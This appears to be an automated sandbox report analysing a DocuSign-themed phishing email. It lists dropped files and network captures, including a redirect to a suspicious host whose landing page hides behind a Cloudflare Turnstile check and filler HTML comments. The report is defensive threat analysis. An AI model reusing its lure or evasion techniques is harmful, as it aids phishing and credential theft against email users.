2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 42 75 73 69 6e 65 73 73 20 46 72 65 65 6d 69 75 6d 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 43 6f 6e 73 75 6d 65 72 20 46 72 65 65 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 Data Ascii: nderAccountPlanName","type":"custom_attribute","value":"Business Freemium"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value":"Consumer Free"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 75 65 22 3a 22 47 6f 6f 67 6c 65 20 44 6f 63 73 20 47 53 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 47 6f 6f 67 6c 65 20 44 72 69 76 65 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 47 6f 6f 67 6c 65 20 47 6d 61 69 6c 20 47 53 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 Data Ascii: ue":"Google Docs GS"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value":"Google Drive"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value":"Google Gmail GS"},{"match":"exact","name":"senderAcc
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 66 31 30 61 31 34 34 30 2d 30 31 33 65 2d 34 31 61 38 2d 39 62 64 39 2d 31 33 63 33 66 31 33 33 31 61 64 61 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 31 33 32 62 33 34 37 36 2d 62 64 63 37 2d 34 38 65 39 2d 38 66 31 61 2d 64 31 30 35 65 62 32 66 36 34 66 64 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 Data Ascii: name":"senderAccountId","type":"custom_attribute","value":"f10a1440-013e-41a8-9bd9-13c3f1331ada"},{"match":"exact","name":"senderAccountId","type":"custom_attribute","value":"132b3476-bdc7-48e9-8f1a-d105eb2f64fd"},{"match":"exact","name":"senderAccountId"

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FW Complete with Docusign Remittance Advice .pdf.eml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F58A9261.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1730223893702497800_B3B03F73-D9B5-4B78-8094-838221CE4D11.log

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1730223893703354600_B3B03F73-D9B5-4B78-8094-838221CE4D11.log

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241029T1344530496-6316.etl

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Windows Analysis Report
FW Complete with Docusign Remittance Advice .pdf.eml

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:36 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nml3ll1nFVeUPX2&MD=cANLcvmX HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-29 17:45:36 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: c453c1a0-9463-438f-a3d3-76c65945a65f MS-RequestId: 7ffdd439-0b5f-41f2-ac1d-62c238591f0c MS-CV: BEzcpKcnYEKGdsze.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 29 Oct 2024 17:45:36 GMT Connection: close Content-Length: 30005
2024-10-29 17:45:36 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-29 17:45:36 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:14 UTC	3413	OUT	GET /track/?data=eyJldmVudCI6ICJDb25zZW50IEFjY2VwdGVkIiwicHJvcGVydGllcyI6IHsiJG9zIjogIldpbmRvd3MiLCIkYnJvd3NlciI6ICJDaHJvbWUiLCIkcmVmZXJyaW5nX2RvbWFpbiI6ICJldS5kb2N1c2lnbi5uZXQiLCIkc2NyZWVuX2hlaWdodCI6IDEwMjQsIiRzY3JlZW5fd2lkdGgiOiAxMjgwLCJtcF9saWIiOiAid2ViIiwiZGlzdGluY3RfaWQiOiAiYjE0NDZmZjMyN2YyNTNjN2YyNWQ3MjNkZjM4MTNiYjBkYzZlNzVkNiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwiUG9zdCBTaWduaW5nIERpYWxvZyI6ICJTYXZlIEEgQ29weSIsIkVudmVsb3BlIElEIjogIjc4NDJkOGRiNTE1ZThlYTliYmVmNGZhMTBhYWU2NWUzMWE5ODIwMjAiLCJSZWNpcGllbnQgSUQiOiAiOWE5NTk2Y2NjMWU1YmE3Y2M1MmMyYjk2MTFhZGYxNGM0YmEwZWE4OCIsIlNpZ25lciBJRCI6ICJiMTQ0NmZmMzI3ZjI1M2M3ZjI1ZDcyM2RmMzgxM2JiMGRjNmU3NWQ2IiwiQnJvd3NlciBWZXJzaW9uIjogIkNocm9tZSAxMzAuMCIsIkZpZWxkcyBSZWNpcGllbnQiOiAiMCIsIkZpZWxkcyBFbnZlbG9wZSI6ICIxIiwiUmVxdWlyZWQgRmllbGRzIjogIjAiLCJMYW5ndWFnZSI6ICJlbiIsIlNpZ25pbmcgQWNjZXNzIjogIlJlbW90ZSIsIkF1dG9OYXYgUnVsZXMiOiAiRmllbGRzUmVxdWlyZWQiLCJSZWNpcGllbnRzIjogIjUwIiwiUmVjaXBpZW50IFR5cGUiOiAiU2lnbmVyIiwiUmVjaXBpZW50cyBXb3JrZmxvdyI6ICI1MCIsIlN [TRUNCATED] Host: api.mixpanel.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://eu.docusign.net Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://eu.docusign.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:14 UTC	529	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Origin: https://eu.docusign.net Access-Control-Expose-Headers: X-MP-CE-Backoff Access-Control-Max-Age: 1728000 Cache-Control: no-cache, no-store Content-Type: application/json Strict-Transport-Security: max-age=604800; includeSubDomains Date: Tue, 29 Oct 2024 17:46:14 GMT Content-Length: 1 Via: 1.1 google Alt-Svc: clear Connection: close
2024-10-29 17:46:14 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:14 UTC	3209	OUT	GET /track/?data=eyJldmVudCI6ICJDb25zZW50IEFjY2VwdGVkIiwicHJvcGVydGllcyI6IHsiJG9zIjogIldpbmRvd3MiLCIkYnJvd3NlciI6ICJDaHJvbWUiLCIkcmVmZXJyaW5nX2RvbWFpbiI6ICJldS5kb2N1c2lnbi5uZXQiLCIkc2NyZWVuX2hlaWdodCI6IDEwMjQsIiRzY3JlZW5fd2lkdGgiOiAxMjgwLCJtcF9saWIiOiAid2ViIiwiZGlzdGluY3RfaWQiOiAiYjE0NDZmZjMyN2YyNTNjN2YyNWQ3MjNkZjM4MTNiYjBkYzZlNzVkNiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwiUG9zdCBTaWduaW5nIERpYWxvZyI6ICJTYXZlIEEgQ29weSIsIkVudmVsb3BlIElEIjogIjc4NDJkOGRiNTE1ZThlYTliYmVmNGZhMTBhYWU2NWUzMWE5ODIwMjAiLCJSZWNpcGllbnQgSUQiOiAiOWE5NTk2Y2NjMWU1YmE3Y2M1MmMyYjk2MTFhZGYxNGM0YmEwZWE4OCIsIlNpZ25lciBJRCI6ICJiMTQ0NmZmMzI3ZjI1M2M3ZjI1ZDcyM2RmMzgxM2JiMGRjNmU3NWQ2IiwiQnJvd3NlciBWZXJzaW9uIjogIkNocm9tZSAxMzAuMCIsIkZpZWxkcyBSZWNpcGllbnQiOiAiMCIsIkZpZWxkcyBFbnZlbG9wZSI6ICIxIiwiUmVxdWlyZWQgRmllbGRzIjogIjAiLCJMYW5ndWFnZSI6ICJlbiIsIlNpZ25pbmcgQWNjZXNzIjogIlJlbW90ZSIsIkF1dG9OYXYgUnVsZXMiOiAiRmllbGRzUmVxdWlyZWQiLCJSZWNpcGllbnRzIjogIjUwIiwiUmVjaXBpZW50IFR5cGUiOiAiU2lnbmVyIiwiUmVjaXBpZW50cyBXb3JrZmxvdyI6ICI1MCIsIlN [TRUNCATED] Host: api.mixpanel.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:15 UTC	507	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: X-MP-CE-Backoff Access-Control-Max-Age: 1728000 Cache-Control: no-cache, no-store Content-Type: application/json Strict-Transport-Security: max-age=604800; includeSubDomains Date: Tue, 29 Oct 2024 17:46:15 GMT Content-Length: 1 Via: 1.1 google Alt-Svc: clear Connection: close
2024-10-29 17:46:15 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:25 UTC	670	OUT	GET /7i2ko/ HTTP/1.1 Host: cosiosos.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:25 UTC	1017	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:46:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.3.33 access-control-allow-origin: * set-cookie: PHPSESSID=64bes3fr1ldegf61evvb22jcl6; path=/ expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pdjq8c%2Bk%2BgkQ2t7MP6k2AHfKbM2RMhVtw8AaAK6iGqTHcB%2BIXDPG7dlZlycMB00ZcenIaokjrhe6St%2FAaka75kWrKK9sbUDjIzOcD4R%2FDvKYBkvZnK4haX5ON5YCM9iYuzM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4fc267c838c56-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1248&delivery_rate=1724836&cwnd=135&unsent_bytes=0&cid=5d7a727460d19404&ts=3139&x=0"
2024-10-29 17:46:25 UTC	352	IN	Data Raw: 38 31 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0a 09 3c 21 2d 2d 20 3c 70 3e 54 68 65 79 20 73 75 70 70 6f 72 74 20 65 79 65 20 68 65 61 6c 74 68 20 77 69 74 68 20 72 69 63 68 20 56 69 74 61 6d 69 6e 20 41 20 61 6e 64 20 62 65 74 61 20 63 61 72 6f 74 65 6e 65 3a 20 46 72 75 69 74 73 20 70 72 6f 6d 6f 74 65 20 76 69 73 69 6f 6e 20 68 65 61 6c 74 68 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 Data Ascii: 818<html lang="en"><head><title></title>... <p>They support eye health with rich Vitamin A and beta carotene: Fruits promote vision health.</p> --><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow"><meta name="viewport"
2024-10-29 17:46:25 UTC	1369	IN	Data Raw: 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 41 6c 6c 20 68 75 6d 61 6e 20 6d 61 6c 65 73 20 77 65 72 65 20 61 73 20 66 61 73 63 69 6e 61 74 65 64 20 77 69 74 68 20 63 61 72 73 20 61 73 20 74 68 65 79 20 77 65 72 65 20 77 69 74 68 20 62 72 65 61 73 74 73 20 2d 2d 3e 0a 09 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 65 6e 74 65 72 65 64 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d Data Ascii: /turnstile/v0/api.js"></script>... All human males were as fascinated with cars as they were with breasts --><style>body{font-family:Arial,sans-serif}.container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-align:center;m
2024-10-29 17:46:25 UTC	358	IN	Data Raw: 65 61 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 3c 70 3e 54 68 65 72 65 e2 80 99 73 20 61 20 6c 6f 74 20 6f 66 20 73 74 72 65 73 73 2e 2e 2e 20 62 75 74 20 6f 6e 63 65 20 79 6f 75 20 67 65 74 20 69 6e 20 74 68 65 20 63 61 72 2c 3c 2f 70 3e 20 2d 2d 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 54 68 65 20 73 61 6d 65 20 77 69 74 68 20 67 6f 6f 64 20 6d 61 6e 6e 65 72 73 3a 20 49 6e 20 73 6f 6d 65 20 70 6c 61 63 65 73 2c 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 71 75 65 73 74 69 6f 6e 6e 61 69 72 65 28 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 73 75 62 6d 69 74 28 29 Data Ascii: eal.</span> --></div></div>... <p>Theres a lot of stress... but once you get in the car,</p> --></div></div>... <span>The same with good manners: In some places,</span> --><script>function questionnaire() {document.forms[0].submit()
2024-10-29 17:46:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:26 UTC	543	OUT	GET /turnstile/v0/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://cosiosos.com.de/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:26 UTC	386	IN	HTTP/1.1 302 Found Date: Tue, 29 Oct 2024 17:46:26 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/g/f2bbd6738e15/api.js Server: cloudflare CF-RAY: 8da4fc2d2e9e2e17-DFW alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:27 UTC	558	OUT	GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://cosiosos.com.de/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:27 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:46:27 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47532 Connection: close accept-ranges: bytes last-modified: Fri, 18 Oct 2024 17:38:58 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8da4fc32085d346a-DFW alt-svc: h3=":443"; ma=86400
2024-10-29 17:46:27 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 6c 5d 28 68 29 2c 66 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 66 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 66 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function rt(e,r){return r=r!=nu
